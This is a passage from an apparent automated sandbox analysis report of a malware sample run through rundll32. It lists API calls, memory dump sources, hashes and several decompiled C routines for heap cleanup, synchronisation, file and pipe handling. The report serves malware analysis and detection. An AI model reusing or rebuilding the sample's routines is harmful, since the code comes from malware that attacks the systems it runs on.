                                                          • lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,051B9CD0,74ECC740,KE,?,69B25F44,E8FA7DD7,00000000,?,?,?,00E5454B), ref: 00E53D44
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D68
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E53D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                          • String ID: KE
                                                          • API String ID: 393707159-838392977
                                                          • Opcode ID: 08e8347fb45017c6adf46bfb33cc38ddbd081b36afa1d87cfeddc09688cab0d1
                                                          • Instruction ID: 070557102039c42f515f31e6ae4fcfdb2f4e3acee7d23ae69f9e961a5b48bfea
                                                          • Opcode Fuzzy Hash: 08e8347fb45017c6adf46bfb33cc38ddbd081b36afa1d87cfeddc09688cab0d1
                                                          • Instruction Fuzzy Hash: A701A732100605ABC7112B758C84AEF7BBD9F8475BF045C24FE1476156D7748A4DC7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05585EBE, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 05585ED0
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                            • Part of subcall function 0558C45A: GetLastError.KERNEL32 ref: 0558C4A5
                                                            • Part of subcall function 0558C45A: WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                            • Part of subcall function 0558C45A: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                            • Part of subcall function 0558C45A: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                            • Part of subcall function 0558C45A: SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                            • Part of subcall function 0558C45A: CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,05577D5B,?,?,00001000,?,?,00001000), ref: 05585EF3
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,05577D5B,?,?,00001000,?,?,00001000), ref: 05585F15
                                                          • GetLastError.KERNEL32(?,05577D5B,?,?,00001000,?,?,00001000), ref: 05585F29
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                          • String ID:
                                                          • API String ID: 3370347312-0
                                                          • Opcode ID: 30fec345845fd9d86305b6f8d3286b1c0d831000d61a5e25cb3d737c9d9f4b36
                                                          • Instruction ID: ff5261f69ab6a69902c76ff4305bf228c76854ab2324abdb43b8f4b9bf127127
                                                          • Opcode Fuzzy Hash: 30fec345845fd9d86305b6f8d3286b1c0d831000d61a5e25cb3d737c9d9f4b36
                                                          • Instruction Fuzzy Hash: DAF0A431214205BBEF116F60EC0AFBA3E26BF05711F110015F702E90D0EB759569EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05583B58, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(0559C000,00000000), ref: 05583B64
                                                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05583B7F
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05583BA8
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05583BC9
                                                            • Part of subcall function 0557BDFA: SetEvent.KERNEL32(?,7519F560,05590797,?,?,0558BCB5), ref: 0557BE0F
                                                            • Part of subcall function 0557BDFA: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 0557BE2F
                                                            • Part of subcall function 0557BDFA: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE38
                                                            • Part of subcall function 0557BDFA: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE42
                                                            • Part of subcall function 0557BDFA: RtlEnterCriticalSection.NTDLL(00000008), ref: 0557BE4A
                                                            • Part of subcall function 0557BDFA: RtlLeaveCriticalSection.NTDLL(00000008), ref: 0557BE62
                                                            • Part of subcall function 0557BDFA: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE7E
                                                            • Part of subcall function 0557BDFA: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE89
                                                            • Part of subcall function 0557BDFA: RtlDeleteCriticalSection.NTDLL(00000008), ref: 0557BE93
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                          • String ID:
                                                          • API String ID: 1103286547-0
                                                          • Opcode ID: 1fe1f5a3498769e13af5cadf6fe99fa0ece3040f12dcbca59dc4e29dac8556cb
                                                          • Instruction ID: fa2a6ae0ac8b7261676518a85802d1b155f04f8d77c087adab1ee2c721f1a325
                                                          • Opcode Fuzzy Hash: 1fe1f5a3498769e13af5cadf6fe99fa0ece3040f12dcbca59dc4e29dac8556cb
                                                          • Instruction Fuzzy Hash: DBF06831754311B7D6306766EC4FF5A3F24FB85B61F070416B605A6190DE6DA80DEB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557798B, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,055797FF,000000FF,059BA7F0,?,?,0557841E,0000003A,059BA7F0), ref: 055779A7
                                                          • GetLastError.KERNEL32(?,?,0557841E,0000003A,059BA7F0,?,?,?,05581876,00000001,00000000,059BB184), ref: 055779B2
                                                          • WaitNamedPipeA.KERNEL32(00002710), ref: 055779D4
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,0557841E,0000003A,059BA7F0,?,?,?,05581876,00000001,00000000,059BB184), ref: 055779E2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                          • String ID:
                                                          • API String ID: 4211439915-0
                                                          • Opcode ID: dda6e0d9268dab07f5bc39612f81de9f7161970802613a2c9d8a40189eaea9ec
                                                          • Instruction ID: 9b472e7a298459716d3905a2bd8e87d2b1b261dced83fd62e062accbfc8f9b22
                                                          • Opcode Fuzzy Hash: dda6e0d9268dab07f5bc39612f81de9f7161970802613a2c9d8a40189eaea9ec
                                                          • Instruction Fuzzy Hash: ABF09632626121ABDB305665FC4EF567F55FB05371F124622F91AE61A0CA251C48EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558EA1C, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,0557D714), ref: 0558EA21
                                                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0558EA36
                                                          • wsprintfA.USER32 ref: 0558EA52
                                                            • Part of subcall function 05586CA6: memset.NTDLL ref: 05586CBB
                                                            • Part of subcall function 05586CA6: lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000020,00000000), ref: 05586CF4
                                                            • Part of subcall function 05586CA6: wcstombs.NTDLL ref: 05586CFE
                                                            • Part of subcall function 05586CA6: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000020,00000000), ref: 05586D2F
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D5B
                                                            • Part of subcall function 05586CA6: TerminateProcess.KERNEL32(?,000003E5), ref: 05586D71
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D85
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DB8
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DBD
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0558EA6E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                          • String ID:
                                                          • API String ID: 1624158581-0
                                                          • Opcode ID: 28a97bc652d4a66a8ebcacd45ab8bf9b6b36fa7480dfcbdc2599e613d80da51e
                                                          • Instruction ID: 4e44ddd4551cb81b81c05c85deeb5771021758621c04a9b2607929409aba493e
                                                          • Opcode Fuzzy Hash: 28a97bc652d4a66a8ebcacd45ab8bf9b6b36fa7480dfcbdc2599e613d80da51e
                                                          • Instruction Fuzzy Hash: 60F0B432614111BBD621672ABD0FF6B3E7DFBC2B70F070112F501E6190DE289C099AA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05577184, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 0557718D
                                                          • Sleep.KERNEL32(0000000A,?,?,?,?,?,05572A10,00000000,00000000), ref: 05577197
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05572A10,00000000,00000000), ref: 055771BF
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 055771DD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 369273442d23e1840b045afae02299e8318a95a909a6056916e57158cdbab3a1
                                                          • Instruction ID: d84b5b79b6cd7f0a69b37183ac0af6446e6ad8730a18757fbcc51dcb344134eb
                                                          • Opcode Fuzzy Hash: 369273442d23e1840b045afae02299e8318a95a909a6056916e57158cdbab3a1
                                                          • Instruction Fuzzy Hash: 17F03A302242809BEB208BA5FC8EF1A7FA4FB04380F164406F446DB191CA28E81CEB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5566B, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E5566B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xe5a2c4; // 0x2ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xe5a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xe5a2c4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xe5a290; // 0x4dc0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x00e5566b
                                                          0x00e55672
                                                          0x00e556bc
                                                          0x00e556be
                                                          0x00e556be
                                                          0x00e55676
                                                          0x00e5567c
                                                          0x00e55681
                                                          0x00e55685
                                                          0x00e5568b
                                                          0x00e55692
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55694
                                                          0x00e55699
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55699
                                                          0x00e5569b
                                                          0x00e556a3
                                                          0x00e556a6
                                                          0x00e556a6
                                                          0x00e556ac
                                                          0x00e556b3
                                                          0x00e556b6
                                                          0x00e556b6
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002EC,00000001,00E56991), ref: 00E55676
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 00E55685
                                                          • CloseHandle.KERNEL32(000002EC), ref: 00E556A6
                                                          • HeapDestroy.KERNEL32(04DC0000), ref: 00E556B6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 1bf642d34ceff8af801215dc7450d422599a59aa5fdedbe108c0335c2361ceba
                                                          • Instruction ID: 2cd824d6fd0777d7e3d2a8e253e7ce7b1467d60fdd9bb5f73c91169fb791eff3
                                                          • Opcode Fuzzy Hash: 1bf642d34ceff8af801215dc7450d422599a59aa5fdedbe108c0335c2361ceba
                                                          • Instruction Fuzzy Hash: 3EF08C72B01751DFEA246B36DC28B8B3BA8AB04B23B080E20BD04F31E2DB64CC0C8551
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E54013, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E00E54013(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xe5a37c; // 0x51b9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xe5a37c; // 0x51b9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xe5a030) {
					HeapFree( *0xe5a290, 0, _t8);
				}
				_t13[1] = E00E538DA(_v0, _t13);
				_t10 =  *0xe5a37c; // 0x51b9630
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}










                                                          0x00e54013
                                                          0x00e54013
                                                          0x00e5401c
                                                          0x00e5402c
                                                          0x00e5402c
                                                          0x00e54031
                                                          0x00e54036
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54026
                                                          0x00e54026
                                                          0x00e54038
                                                          0x00e5403c
                                                          0x00e5404e
                                                          0x00e5404e
                                                          0x00e5405e
                                                          0x00e54061
                                                          0x00e54066
                                                          0x00e5406a
                                                          0x00e54070

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E5401C
                                                          • Sleep.KERNEL32(0000000A,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E54026
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E5404E
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E5406A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 5b32884015135a832a4364ce47658854f4fc1d4032ac68b171fc5a6ff8d4ce48
                                                          • Instruction ID: f18bd62d2296bb7fa15a1c24c4f484863f99ea65e1ca91be4b0cee22b4144c57
                                                          • Opcode Fuzzy Hash: 5b32884015135a832a4364ce47658854f4fc1d4032ac68b171fc5a6ff8d4ce48
                                                          • Instruction Fuzzy Hash: 86F05470204340DFDB289B36DC49B963BA4EB0434BB185C10FA55F61F1C220D84CD712
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05574C1B, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05574C24
                                                          • Sleep.KERNEL32(0000000A,?,?,?,?,?,05572A10,00000000,00000000), ref: 05574C2E
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05572A10,00000000,00000000), ref: 05574C5C
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05574C71
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 4c368b5c41dd7d103456785eefe6c720630c95edc159c1ad191166c29a629923
                                                          • Instruction ID: 43c7b46a42e9138cf6735627ec6889197d7454c9c54921436ae5353bd91a7182
                                                          • Opcode Fuzzy Hash: 4c368b5c41dd7d103456785eefe6c720630c95edc159c1ad191166c29a629923
                                                          • Instruction Fuzzy Hash: C3F0DA74221200DBEF18CF94E99BF257B69BB44345B068406F8468B290CB38AC08EA15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5152E, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E00E5152E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xe5a37c; // 0x51b9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xe5a37c; // 0x51b9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xe5a37c; // 0x51b9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xe5b85e) {
					HeapFree( *0xe5a290, 0, _t10);
					_t7 =  *0xe5a37c; // 0x51b9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x00e5152e
                                                          0x00e51537
                                                          0x00e51547
                                                          0x00e51547
                                                          0x00e5154c
                                                          0x00e51551
                                                          0x00000000
                                                          0x00000000
                                                          0x00e51541
                                                          0x00e51541
                                                          0x00e51553
                                                          0x00e51558
                                                          0x00e5155c
                                                          0x00e5156f
                                                          0x00e51575
                                                          0x00e51575
                                                          0x00e5157e
                                                          0x00e51580
                                                          0x00e51584
                                                          0x00e5158a

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E51537
                                                          • Sleep.KERNEL32(0000000A,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E51541
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E5156F
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E51584
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: e2610031855781fd9cf8c32cfa7107cb3b54f91445052855f7dce2949ff91b3d
                                                          • Instruction ID: 3dfdda7bb32d79b6c4e1c1b123a5a5898c8a251196d993b687c90dd42eac83ef
                                                          • Opcode Fuzzy Hash: e2610031855781fd9cf8c32cfa7107cb3b54f91445052855f7dce2949ff91b3d
                                                          • Instruction Fuzzy Hash: 5CF0DA74200300DFE71C9F26EC4AB6937A5BB44707B085D69F902B73B1D774AD08DA12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055888D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,?,?), ref: 05588915
                                                          • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 05588927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: 0x
                                                          • API String ID: 3510742995-3225541890
                                                          • Opcode ID: 6e1363ecf9d82aa61333dd8a3ff93f5ef0d3794dae9ce7d8fb6dd7887da40a5e
                                                          • Instruction ID: cd8a4c534761a7307d6189e93cdfc247a0f100fa17657fed837e16e61be5c7b2
                                                          • Opcode Fuzzy Hash: 6e1363ecf9d82aa61333dd8a3ff93f5ef0d3794dae9ce7d8fb6dd7887da40a5e
                                                          • Instruction Fuzzy Hash: F4017135A00119BBDB01EFA8D8059AFBBB9FB44644F404415E915E7200EB74DA09C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05579DF4, Relevance: 5.2, APIs: 4, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 05579E53
                                                          • CloseHandle.KERNEL32(?,00000000,00000100,?,00000000,?,05571A31,00000000), ref: 05579EA1
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,05587F46,00000000,05571A31,05577A78,00000000,05571A31,055909BE,00000000,05571A31,05577886,00000000), ref: 0557A1E5
                                                          • GetLastError.KERNEL32(?,00000000,?), ref: 0557A42C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFreeHandleHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 2333114656-0
                                                          • Opcode ID: 4fd60f6a1e6b86bb25de421a590853cc7650b9f058ea0caa4383bb9ecd54ba01
                                                          • Instruction ID: 6e49b4968378c1aa7909e30f6fb29224a6e36c122802c23fe111d9dafb715edf
                                                          • Opcode Fuzzy Hash: 4fd60f6a1e6b86bb25de421a590853cc7650b9f058ea0caa4383bb9ecd54ba01
                                                          • Instruction Fuzzy Hash: FE41E53120420DFBDB21AF64EC4DFAF3A6BFB89760F014412F906A6090EB75C8559BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557D7E6, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055740E8: lstrlen.KERNEL32(00000000,?,?), ref: 05574141
                                                            • Part of subcall function 055740E8: lstrlen.KERNEL32(?,?,?), ref: 0557415F
                                                            • Part of subcall function 055740E8: RtlAllocateHeap.NTDLL(00000000,75146985,?), ref: 05574188
                                                            • Part of subcall function 055740E8: memcpy.NTDLL(00000000,00000000,00000000), ref: 0557419F
                                                            • Part of subcall function 055740E8: HeapFree.KERNEL32(00000000,00000000), ref: 055741B2
                                                            • Part of subcall function 055740E8: memcpy.NTDLL(00000000,?,?), ref: 055741C1
                                                          • GetLastError.KERNEL32 ref: 0557D885
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734BA
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 055734DE
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734EC
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557D8A1
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557D8B2
                                                          • SetLastError.KERNEL32(00000000), ref: 0557D8B5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                          • String ID:
                                                          • API String ID: 2451549186-0
                                                          • Opcode ID: 27bce40a8dc9df6a41aba72a53cdc1455df345d689b502f0f14e6f6b9c05d6fb
                                                          • Instruction ID: 14a2651293f8fc203b241c62a4f91745a8ab36ef07ff6ebf4dc9c0b6a4566267
                                                          • Opcode Fuzzy Hash: 27bce40a8dc9df6a41aba72a53cdc1455df345d689b502f0f14e6f6b9c05d6fb
                                                          • Instruction Fuzzy Hash: FE314932900108EFCF029F99E845C9EBFB5FF84320B054566F916A3160C7369A65EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05586BBB, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055765DC: lstrlenW.KERNEL32(?), ref: 05576600
                                                            • Part of subcall function 055765DC: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05576612
                                                            • Part of subcall function 055765DC: wcstombs.NTDLL ref: 05576620
                                                            • Part of subcall function 055765DC: lstrlen.KERNEL32(00000000), ref: 05576644
                                                            • Part of subcall function 055765DC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05576659
                                                            • Part of subcall function 055765DC: mbstowcs.NTDLL ref: 05576666
                                                            • Part of subcall function 055765DC: HeapFree.KERNEL32(00000000,00000000), ref: 05576678
                                                            • Part of subcall function 055765DC: HeapFree.KERNEL32(00000000,00000000), ref: 05576692
                                                          • GetLastError.KERNEL32 ref: 05586C5A
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734BA
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 055734DE
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734EC
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05586C76
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05586C87
                                                          • SetLastError.KERNEL32(00000000), ref: 05586C8A
                                                          Memory Dump Source
